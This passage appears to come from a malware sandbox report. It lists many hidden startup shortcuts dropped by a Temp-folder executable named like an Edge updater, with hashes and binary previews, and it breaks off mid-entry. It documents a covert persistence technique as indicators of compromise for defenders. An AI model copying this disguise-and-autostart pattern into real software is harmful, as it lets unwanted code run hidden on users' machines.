Preview:	L..................F...."...o.k....N........0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2b8d7e8baeb9413bb5be22eea72c381c.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:31 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.946821917868199
Encrypted:	false
SSDEEP:	24:8Pd9eA3pd+E0ROgKKIHRNglhW8Apfv/42eVvqyFm:8Pdger0ROrRvggyF
MD5:	D18FA5210DD59089DFD32A5C732C3271
SHA1:	317DD481390803E094B0264DDB32D9C380E527D9
SHA-256:	1B361763FE23DCB97FE6960C4DAF61DCE821CE4514D20ABFA8B3ADCDDCADEC96
SHA-512:	54AFFA16E4CE8A2DA0B97C137DF95F695D6F94D584B42C399563A64A241FDEEFBFA22D7BB0A3C713BB331CD1FD60A6203842C67BEE73D89A6CCC79A6D80D5143
Malicious:	false
Preview:	L..................F...."...o.k.............0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY0=..Temp..:......CW.^BY0=....l.....................nQ..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3a71cca9579748349fc1affd6b36eba4.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:40:58 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.948451571567827
Encrypted:	false
SSDEEP:	24:8P+A3pd+E0R+gKZz2NglhW8Apfv/42eVvqyFm:8P+er0RAzwRvggyF
MD5:	6BEC67F908AE16FC493B7ED8C6037B22
SHA1:	A8030AE1903CF70BF699221E48C2B854E20699A0
SHA-256:	33DCE2BB714A1D4BFCC83E1414BC8BCFFEB3DCD38637A9D589D40B223433E01D
SHA-512:	C321148303CE34B552DAA5503FBADEE81D279DAB18AC1D41F331872881E0A322400EE635AF766D1137400A19B2E56F6473080FD673678A4B5E2213A4CEA88C4B
Malicious:	false
Preview:	L..................F...."...o.k......!l.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY =..Temp..:......CW.^BY =....l.......................*.T.e.m.p.....`.1.....BY =..EDGEUP~1..H......BY =BY =..........................O ..E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3de829bb2acd486d87d00b0945bcbb90.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:33 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.959503019031122
Encrypted:	false
SSDEEP:	24:8PjOpd+E0RngK/cRNglhW8Apfv/42eVvqyFm:8PjOr0RncrRvggyF
MD5:	DF37F45AAA37A1F024FBC3BE293E7821
SHA1:	46C1F61483E5FC0ABFB25F2472FF2267FDAA59B6
SHA-256:	4A13F2517ACB5D7E6BCBABCE366BFD958D4420E551A0120EF89FED81786AFD2E
SHA-512:	4B22DA8655C1BDE0D2856903BBCDA30D2B6BA2BD0B59BB816E6141A8FFDC466B4AD08F7D9F3EC3F2A96431446F127F81D08AEE584A139F186B9E2DE11844B248
Malicious:	false
Preview:	L..................F...."...o.k....[.a......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....../.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYQ=..Temp..:......CW.^BYQ=....l......................Mw.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3ded82778eac44198fe2af38e5d90fb1.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:25 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.95155579168629
Encrypted:	false
SSDEEP:	24:8PC2A3pd+E0RrgKjWRNglhW8Apfv/42eVvqyFm:8PC2er0RmrRvggyF
MD5:	A636E6497CB4AE657F0981F201C7137B
SHA1:	B1AEA39C78C7CE2030342A6DE56BD9FCD353A95F
SHA-256:	18A321B10A1E131EE5CEBC11A1499623CE180B2B7E6DD36B4DF6F453974E79DC
SHA-512:	35DFE35259ACAE301701BF188301C86F0BE3EAE60A49BD05990F63C4B40BA93DA9E85A883FCEC42BF46BF3C5B7DCAF11EF030E9326F40F25B2B2AA4445B3F64E
Malicious:	false
Preview:	L..................F...."...o.k...........0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYM=..Temp..:......CW.^BYM=....l.......................+.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3e05732c2d0d4ea6b1d93b0f05c10f70.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:13 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.957414011125441
Encrypted:	false
SSDEEP:	24:8P0A3pd+E0R+gKrRNglhW8Apfv/42eVvqyFm:8P0er0RSrRvggyF
MD5:	AC63AD5924C00B48B021C120352AEB6A
SHA1:	CB25CA82AD9D54AA088F126ACA406D680D823F3B
SHA-256:	9A2BDF622B61CC89852A28059B06601AAC44BD15F576BAF92F75E7423F3EE2B6
SHA-512:	E56C9E4F3929E27537B707700D9FCFB74CC738A13D177946737A21DBB90FF5F085D0CF4F262FA5D04030A360C00119C1C5B55406721259F3F26B635EBACD9A63
Malicious:	false
Preview:	L..................F...."...o.k......t.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY =..Temp..:......CW.^BY =....l.......................*.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3e121c1e1fec41f7ae729797b3f9a124.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:33 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.947036550196814
Encrypted:	false
SSDEEP:	24:8PIA3pd+E0RHgKfP0QRNglhW8Apfv/42eVvqyFm:8PIer0RnP0QrRvggyF
MD5:	785307C859483672F624A4655C93EEB4
SHA1:	75E4246263D91CAB6F9A8527ADF908AACE3B4A7A
SHA-256:	BF6FBC5B9583B9C360686A3A82FCBC34EAB08B190481B4C0F12AC67871683C25
SHA-512:	9B05517C7F33F6B0D98B805F86141CCE230213589D777E74EDE7486D85490C131204913D6167904103346980C6F92456C07114CA8F5A47980C249C70E74BE712
Malicious:	false
Preview:	L..................F...."...o.k.....!x......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY1=..Temp..:......CW.^BY1=....l......................K..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3e26d23f28e24e709de32f04528c4c37.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:26 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.9608074647008
Encrypted:	false
SSDEEP:	24:8PlOpd+E0R4gKGaRNglhW8Apfv/42eVvqyFm:8PlOr0RIrRvggyF
MD5:	BD9FFCFB88483FD0976356D03DB1A1A7
SHA1:	E2FCF10CA4713E1A7D99F6DB220174532B89CB64
SHA-256:	1C7362C2B21CA29B696353406FBCE45B7AB74D3598C650413399AA8851FDA494
SHA-512:	B5782D1366265AB1A217014CAE843774C4CC899824D7583AB09565726C6AFA89943BFD38C5D944DA45F47172577EA2EAE293A0250B1322EB61845CAF3CE33DE7
Malicious:	false
Preview:	L..................F...."...o.k.............0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....../.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYN=..Temp..:......CW.^BYN=....l.........................T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3ffc37bd34a64becbd10f5e9622a1e9e.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:55 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.946880465996988
Encrypted:	false
SSDEEP:	24:8Ps8aFpd+E0RggKLOxRNglhW8Apfv/42eVvqyFm:8PRaFr0ROOxrRvggyF
MD5:	887249133D118A47A1D3D0A221084084
SHA1:	43EA5C481EF9AB329D39D77C3C07DE03B8F6CA6B
SHA-256:	1405BDF7DC2D29615C84D378971DBC9E3008CA7F55D00A5E70C09D607F637FBA
SHA-512:	E8996E4ABF7D3EBA36C7465706997CC381F0AB1C669AB09DD7D9F314CD1399942AB909AEB5DDBC88E8A385A77A3DED976A3CC2AB0BC315E8277B564D8282EF4D
Malicious:	false
Preview:	L..................F...."...o.k....DUw......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....:N..........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYV=..Temp..:......CW.^BYW=....l......................v@.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4177619b61374f768b8d8a5d54d97036.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:22 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.950640205314992
Encrypted:	false
SSDEEP:	24:8PkA3pd+E0RygKARNglhW8Apfv/42eVvqyFm:8Pker0RprRvggyF
MD5:	973BCFF3C5128A7BFD9889934DD65FD8
SHA1:	1A3A0A2AB4CB84A09CB6EEE94A645963C814C0C3
SHA-256:	62F24BB08133695FDB7EE527D09C7F61794AD0172EDDBB5B26F6E1125C92C0F3
SHA-512:	797417880D767215735D736EAED435ADCFCF8AE493656222C611A3DB8C8E5473C35E297BBF0926875EEFF420B020BB6876A16550CE50A7199784A2E4B1A95326
Malicious:	false
Preview:	L..................F...."...o.k....u/Pz.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY,=..Temp..:......CW.^BY,=....l.........................T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4749e2cc368144059b4cd1888c3b6beb.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:13 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.948860913923859
Encrypted:	false
SSDEEP:	24:8PYA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8PYer0R5rRvggyF
MD5:	4E5C192D6F888AC8B0C1DE455AB7B57A
SHA1:	9EB8B4E3B32144D34C3B49EDCBD63649D4DABB15
SHA-256:	48E33E6F9C633037747112BA64E0E6A2E8D8474C1215E585779C6C6D4288011E
SHA-512:	2F602395DC56DAABA999C39EB4B51D8E0998ACF170DD977C7A82773B739EC3C553CE6C945D16C9C6279214EF5192F8898B9BDF313D6563225DD8CA70C4244DC0
Malicious:	false
Preview:	L..................F...."...o.k.....=......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_485b83aa429741dcb776592402747a5a.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:03 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.953582018280042
Encrypted:	false
SSDEEP:	24:8PzoA3pd+E0R+gKncNglhW8Apfv/42eVvqyFm:8Pker0RWSRvggyF
MD5:	0CE7AF5BE9EF54CBEE60A1704168914C
SHA1:	0226F76909A3C870D5DE6297B891E5CA8DDAF02A
SHA-256:	624A1E06924085DF1919191BDAB6C7CDBDC6E4F6C78CA86B55C1FFB20C3C53BB
SHA-512:	EA454D888D987AAFC15A19E6DC93DD1EDE5F60B5A2C7178563B7AFF3BBD6175E8782A2CC2529F6D74FD40546C642BC4DD5A7ACD607F42F0E9E4FF998AB894C0C
Malicious:	false
Preview:	L..................F...."...o.k......n.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY =..Temp..:......CW.^BY =....l.......................*.T.e.m.p.....`.1.....BY"=..EDGEUP~1..H......BY =BY"=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4d47a5c509e64c64995ac0266ce71e85.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:50 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.9494834040349
Encrypted:	false
SSDEEP:	24:8PGA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8PGer0R5rRvggyF
MD5:	0B5998D3D3FD47879B9040929A628005
SHA1:	19223CA2B91B38E863F83D713FE77B23FA8BD226
SHA-256:	2AF7502E3FCA4EA487B058CC581723A6D0476C27DCDF9243BE0E94D3F6156F58
SHA-512:	2D9ACEDBCC77A70275DAB686E8B8E4297E97FF7D54DAA8B4A18C0C1CDE7B22139AED17237E4164B08DE8D7C864CDB977AAAA0C26382DF42CA8217D77A1F7E11D
Malicious:	false
Preview:	L..................F...."...o.k....d.......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4f7959b6ce66415cbc94177055f7eb83.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:35 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.9445651041903185
Encrypted:	false
SSDEEP:	24:8PthA3pd+E0RkgK4QRNglhW8Apfv/42eVvqyFm:8P3er0RmrRvggyF
MD5:	959239A0A96B5911CC24B54F6420BD0C
SHA1:	5DC9545EA1406B9DB64A94C0A226AA3BF5EB8A03
SHA-256:	2E54CEF7E702F796525599D722E6869ECC7EC4C3D9FC6B77D1C5BA1B8AB22302
SHA-512:	7649854876885EB6B64672313AAC414C8FAA75E91F7C7EEF6E598529D35CC3B8C51365793CBEFA92C84C2C22E88331F93F9384A0C6C38F9FD56F3B23CB8F5F27
Malicious:	false
Preview:	L..................F...."...o.k.....8......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY2=..Temp..:......CW.^BY2=....l.......................t.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY 